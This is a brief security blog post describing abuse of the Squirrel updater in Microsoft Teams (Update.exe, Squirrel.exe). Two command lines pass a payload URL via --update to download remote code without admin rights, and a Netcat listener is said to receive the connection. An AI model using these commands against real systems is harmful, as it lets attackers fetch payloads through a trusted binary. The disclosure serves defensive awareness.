Downloading Payloads With Microsoft Teams

Image result for microsoft teams

It was recently found that Microsoft Teams had a vulnerability which allows malicious parties to download payloads. This is due to its under-lining auto-update mechanism called Squirrel. It’s not just Microsoft teams who just use this, GitHub, UIPath and WhatsApp also use Squirrel behind the scenes.

It was recently found though that the Squirel.exe and Microsoft Teams update.exe can be ran with defined arguments. This could be abused, and malicious parties could use it to download payloads.

You don’t have to be admin and can test the exploit by running the following:

Update.exe – -update=[Payload URL]

Squirel.exe – -update=[Payload URL]

The example below shows the client establishing a connection to me Netcat session. Just to prove it will connect.

Other arguments can be used such as – -download and – -updateRollback.

Advertisement

Securethelogs

,
, ,

One response to “Downloading Payloads With Microsoft Teams”

  1. Windows Shell – Discovery Stage – Ctrl Alt Del

    […] Example: https://ctrlaltdel.blog/2019/07/12/downloading-payloads-with-microsoft-teams/ […]

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create a website or blog at WordPress.com

%d bloggers like this: